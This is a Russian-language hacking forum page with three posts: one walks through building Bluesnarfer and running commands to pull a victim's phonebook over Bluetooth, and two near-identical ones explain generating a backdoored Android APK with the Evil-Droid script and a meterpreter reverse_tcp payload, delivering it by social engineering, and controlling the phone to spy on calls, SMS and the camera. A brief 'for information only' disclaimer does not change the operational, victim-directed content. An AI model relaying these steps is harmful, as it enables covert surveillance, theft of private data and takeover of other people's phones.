  21. Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами. Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах. В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: sudo apt-get update && apt-get upgrade Далее клонируем репозиторий с помощью команды: git clone https://github.com/boos/bluesnarfer Переходим в директорию: cd bluesnarfer И компилируем утилиту: make После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере: hciconfig hci0 up Далее сканируем доступные устройства с включенным Bluetooth: hcitool scan Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит: l2ping Просматриваем возможность подключения к жертве, используя rfcomm: sdptool browse --tree --l2cap адрес жертвы> Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы: bluesnarfer -r -b Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки: bluesnarfer -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  22. Привет, хакеры, в этой статье поговорим о взломе андроид смартфонов. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно. Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Мы уже публиковали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Давайте разберемся, что нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке, и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список, воспользуйтесь параметром –help или -h(идентичны). Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  23. Приветствую хакеры, наверно каждый из вас хоть раз хотел взломать смартфон, удалённо прослушивать разговоры, просматривать SMS и т.д. И это вполне возможно сделать. В этой статье я вам расскажу и покажу (скриншоты), как можно получить доступ к Android-смартфону. Кое-что об Android Начну с того, что что Android является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Итак, начнем! Для взлома нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h (идентичны). Для лучшего восприятия процесса взлома прикрепляю скриншоты Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.